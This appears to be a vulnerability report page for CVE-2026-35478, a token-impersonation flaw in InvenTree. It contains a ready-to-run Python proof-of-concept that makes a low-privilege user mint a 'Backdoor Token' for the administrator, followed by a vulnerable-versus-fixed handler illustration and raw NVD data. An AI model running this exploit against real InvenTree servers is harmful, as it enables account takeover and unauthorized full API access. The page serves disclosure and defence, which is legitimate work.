Security Vulnerability Report
CVE-2026-35478 CVSS 8.3 HIGH

Published: 2026-04-08 20:16:25
Last Modified: 2026-04-20 15:12:04

Description

InvenTree is an Open Source Inventory Management System. From 0.16.0 to before 1.2.7, any authenticated InvenTree user can create a valid API token attributed to any other user in the system — including administrators and superusers — by supplying the target's user ID in the user field of a POST /api/user/tokens/ request. The returned token is immediately usable for full API authentication as the target user, from any network location, with no further interaction required. This vulnerability is fixed in 1.2.7 and 1.3.0.

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:* - VULNERABLE
InvenTree versions from 0.16.0 up to, but not including, 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration
target_url = "http://localhost:8000"
api_endpoint = f"{target_url}/api/user/tokens/"

# Attacker's credentials (low-privilege user)
attacker_username = "lowpriv_user"
attacker_password = "password123"

# Target user ID (e.g., the administrator ID is usually 1)
target_user_id = 1


def login_and_get_token():
    """Log in as the low-privilege user and retrieve an auth token."""
    login_url = f"{target_url}/api/auth/token/"
    data = {"username": attacker_username, "password": attacker_password}
    response = requests.post(login_url, data=data)
    if response.status_code == 200:
        return response.json().get("token")
    print(f"Login failed: {response.text}")
    return None


def exploit_admin_token_creation(auth_token):
    """Create a token for the target user using the attacker's session."""
    headers = {
        "Authorization": f"Token {auth_token}",
        "Content-Type": "application/json",
    }
    # Payload to create a token for target_user_id (the admin)
    payload = {
        "user": target_user_id,
        "label": "Backdoor Token",
        "write": True,
        "read": True,
    }
    print(f"[*] Attempting to create token for User ID: {target_user_id}...")
    response = requests.post(api_endpoint, headers=headers, json=payload)
    if response.status_code == 201:
        print("[+] Success! Token created.")
        print(f"[+] Admin Token Key: {response.json().get('key')}")
    else:
        print(f"[-] Exploit failed. Status: {response.status_code}")
        print(f"[-] Response: {response.text}")


if __name__ == "__main__":
    token = login_and_get_token()
    if token:
        exploit_admin_token_creation(token)
```
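As an added illustration of the defect class (CWE-639, trusting a client-supplied object reference) and of the fix pattern, not code from InvenTree or from the advisory: a minimal token-creation handler that honours the request body's `user` field, beside one that binds every new token to the authenticated caller. `User`, `USERS`, `TOKENS`, `whoami` and the handler names are constructed assumptions for this example.

```python
from __future__ import annotations

import secrets
from dataclasses import dataclass


# Constructed in-memory stand-ins (hypothetical; not InvenTree's models or views)
@dataclass
class User:
    id: int
    username: str
    is_superuser: bool = False


USERS = {1: User(1, "admin", True), 7: User(7, "lowpriv_user")}
TOKENS: dict[str, int] = {}  # token key -> owner user id


def _issue(owner_id: int, label: str) -> tuple[int, dict]:
    """Mint a token for owner_id and return an HTTP-style (status, body) pair."""
    key = "inv-" + secrets.token_hex(16)
    TOKENS[key] = owner_id
    return 201, {"key": key, "user": owner_id, "label": label}


def create_token_vulnerable(caller: User, payload: dict) -> tuple[int, dict]:
    """Vulnerable pattern: the 'user' field in the body decides who owns the token."""
    owner_id = int(payload.get("user", caller.id))
    if owner_id not in USERS:
        return 400, {"detail": "unknown user"}
    return _issue(owner_id, payload.get("label", ""))


def create_token_fixed(caller: User, payload: dict) -> tuple[int, dict]:
    """Hardened pattern: the owner is always the authenticated caller.

    A 'user' value naming anyone else is rejected outright rather than
    silently ignored, so a misbehaving client is visible in the 403s.
    """
    requested = payload.get("user")
    if requested is not None and int(requested) != caller.id:
        return 403, {"detail": "tokens may only be created for the authenticated user"}
    return _issue(caller.id, payload.get("label", ""))


def whoami(token_key: str) -> User | None:
    """Which user a later request presenting this token would authenticate as."""
    owner_id = TOKENS.get(token_key)
    return USERS.get(owner_id) if owner_id is not None else None
```

With the vulnerable handler the low-privilege caller's token authenticates as the superuser; with the fixed handler the same request is refused and a request without a `user` field yields a token bound to the caller.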

References

https://github.com/inventree/InvenTree/security/advisories/GHSA-qh5j-c28q-c4rg (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35478",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-08T20:16:24.630",
    "lastModified": "2026-04-20T15:12:03.863",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "InvenTree is an Open Source Inventory Management System. From 0.16.0 to before 1.2.7, any authenticated InvenTree user can create a valid API token attributed to any other user in the system — including administrators and superusers — by supplying the target's user ID in the user field of a POST /api/user/tokens/ request. The returned token is immediately usable for full API authentication as the target user, from any network location, with no further interaction required. This vulnerability is fixed in 1.2.7 and 1.3.0."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"},
          "exploitabilityScore": 2.8,
          "impactScore": 5.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.16.0", "versionEndIncluding": "1.2.6", "matchCriteriaId": "ADB98168-9764-4D5D-9DF9-44D08A33DC26"}]}]}
    ],
    "references": [
      {"url": "https://github.com/inventree/InvenTree/security/advisories/GHSA-qh5j-c28q-c4rg", "source": "[email protected]", "tags": ["Third Party Advisory"]}
    ]
  }
}
```